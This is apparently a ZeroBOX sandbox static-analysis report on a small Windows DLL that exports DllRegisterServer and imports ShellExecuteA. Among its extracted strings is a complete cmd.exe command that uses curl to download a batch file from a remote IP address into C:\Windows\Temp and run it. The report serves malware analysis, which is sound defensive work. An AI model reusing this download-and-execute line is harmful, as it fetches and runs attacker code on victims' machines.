popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2025-01-21 11:22:49

PDB Path

C:\Users\Administrator\source\repos\Project10\Release\Project10.pdb

PE Imphash

7ceca204ebc32aa6a49c38b8ef6a9854

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000bd63 0x0000be00 6.58495591645
.rdata 0x0000d000 0x000060c0 0x00006200 4.82324689163
.data 0x00014000 0x0000133c 0x00000a00 2.05564225397
.rsrc 0x00016000 0x000001e0 0x00000200 4.71377258295
.reloc 0x00017000 0x00000ea4 0x00001000 6.25188487279

Resources

Name Offset Size Language Sub-language File type
RT_MANIFEST 0x00016060 0x0000017d LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document text

Imports

Library SHELL32.dll:
0x1000d108 ShellExecuteA
Library KERNEL32.dll:
0x1000d000 IsValidCodePage
0x1000d004 DecodePointer
0x1000d010 GetCurrentProcess
0x1000d014 TerminateProcess
0x1000d020 GetCurrentProcessId
0x1000d024 GetCurrentThreadId
0x1000d02c InitializeSListHead
0x1000d030 IsDebuggerPresent
0x1000d034 GetStartupInfoW
0x1000d038 GetModuleHandleW
0x1000d03c InterlockedFlushSList
0x1000d040 RtlUnwind
0x1000d044 GetLastError
0x1000d048 SetLastError
0x1000d04c EnterCriticalSection
0x1000d050 LeaveCriticalSection
0x1000d054 DeleteCriticalSection
0x1000d05c TlsAlloc
0x1000d060 TlsGetValue
0x1000d064 TlsSetValue
0x1000d068 TlsFree
0x1000d06c FreeLibrary
0x1000d070 GetProcAddress
0x1000d074 LoadLibraryExW
0x1000d078 EncodePointer
0x1000d07c RaiseException
0x1000d080 ExitProcess
0x1000d084 GetModuleHandleExW
0x1000d088 GetModuleFileNameW
0x1000d08c HeapAlloc
0x1000d090 HeapFree
0x1000d094 FindClose
0x1000d098 FindFirstFileExW
0x1000d09c FindNextFileW
0x1000d0a0 CloseHandle
0x1000d0a4 GetACP
0x1000d0a8 GetOEMCP
0x1000d0ac GetCPInfo
0x1000d0b0 GetCommandLineA
0x1000d0b4 GetCommandLineW
0x1000d0b8 MultiByteToWideChar
0x1000d0bc WideCharToMultiByte
0x1000d0c0 GetEnvironmentStringsW
0x1000d0c8 LCMapStringW
0x1000d0cc GetProcessHeap
0x1000d0d0 GetStdHandle
0x1000d0d4 GetFileType
0x1000d0d8 GetStringTypeW
0x1000d0dc HeapSize
0x1000d0e0 HeapReAlloc
0x1000d0e4 SetStdHandle
0x1000d0e8 FlushFileBuffers
0x1000d0ec WriteFile
0x1000d0f0 GetConsoleOutputCP
0x1000d0f4 GetConsoleMode
0x1000d0f8 SetFilePointerEx
0x1000d0fc CreateFileW
0x1000d100 WriteConsoleW

Exports

Ordinal Address Name
1 0x10001000 DllRegisterServer
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
URPQQh "
UQPXY]Y[
QQSVWd
uSSSSj
f9:t!V
PPPPPPPP
PPPPPWV
PP9E uPPSWP
QQSVj8j@
PVVVVV
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__swift_1
__swift_2
__swift_3
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
operator co_await
operator<=>
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`anonymous namespace'
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
Unknown exception
bad exception
CorExitProcess
AreFileApisANSI
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
/c cd C:\Windows\Temp\ & curl -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" -o AppS.bat http://147.45.44.131/infopage/vsgqwn1qxS.bat & start AppS.bat
cmd.exe
C:\Users\Administrator\source\repos\Project10\Release\Project10.pdb
.text$mn
.text$x
.idata$5
.00cfg
.CRT$XCA
.CRT$XCZ
.CRT$XIA
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$voltmd
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.edata
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.data$rs
.rsrc$01
.rsrc$02
Project10.dll
DllRegisterServer
ShellExecuteA
SHELL32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
InterlockedFlushSList
RtlUnwind
GetLastError
SetLastError
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
GetProcAddress
LoadLibraryExW
EncodePointer
RaiseException
ExitProcess
GetModuleHandleExW
GetModuleFileNameW
HeapAlloc
HeapFree
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
WideCharToMultiByte
GetEnvironmentStringsW
FreeEnvironmentStringsW
LCMapStringW
GetProcessHeap
GetStdHandle
GetFileType
GetStringTypeW
HeapSize
HeapReAlloc
SetStdHandle
FlushFileBuffers
WriteFile
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
CreateFileW
CloseHandle
WriteConsoleW
DecodePointer
KERNEL32.dll
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVbad_exception@std@@
.?AVexception@std@@
.?AVtype_info@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
44&4.464>4J4S4X4^4h4r4
5?5H5U5[5a5m5s5
787G7^7d7j7p7v7|7
7=8J8n8
8M9f9p9
:=:G:P:
;F;P;Y;b;w;
=G=O=a=n=
2"343H3n3|3
424C4O4k4
;0>X>l>~>
?9?F?O?T?Y?t?~?
0.0>0H0
8 989>9N9t9
=]>H?x?
0+040L0S0_0w0|0
222:2C2L2]2n2
929D9R9e9p9{9
:#;5;9;A;M;j;
<8<Q<V<
20K0x0
2N3)404X4r4
5+5?5]5
6.6=6O6b6|6
7)737U7f7{7
8N9g9q9}9
6_6f6m6t6
6"757Z7
91:K:]:
;(;6;L;|;
=3>8>>>C>
0N1S1X1h1m1r1
202Q2^2s2|2
3=3Q3V3[3v3
464E4P4U4Z4{4
5#5,5C5U5a5n5u5
898P8k8
839:9A9H9U9
?-?B?Y?|?
)0/0V0`0
0a1'2-2b2{2
0(1.1V1
33;3B3Y3o3
55j5y5
40U0\0s0
303B3T3f3x3
4)4;4M4
? ?.?d?
112=2Q2]2i2
33/3;3J3]4
5$585C5
9=:H:N:W:
<w<2=D=V=
:;:O:U:
1$1(1,181<1@1T1X1\1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
;,<0<4<L<P<T<0=8=@=D=H=L=P=T=X=\=d=h=l=p=t=x=|=
? ?$?X?\?`?d?h?l?p?t?x?|?
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6
0$0,040<0D0L0T0\0d0l0t0|0
1$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
;$;,;4;<;D;L;T;\;d;l;t;|;
? ?$?,?D?T?X?h?l?p?x?
5,505P5X5\5x5
6 6(60646<6P6X6l6
747@7x7
888X8x8
989X9x9
6 606H6T6X6\6x6|687<7@7D7H7L7P7T7X7\7h7l7p7t7x7|7
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
api-ms-
mscoree.dll
api-ms-win-core-datetime-l1-1-1
api-ms-win-core-file-l1-2-4
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernelbase
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-win-core-fibers-l1-1-0
ext-ms-
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
No antivirus signatures available.
No IRMA results available.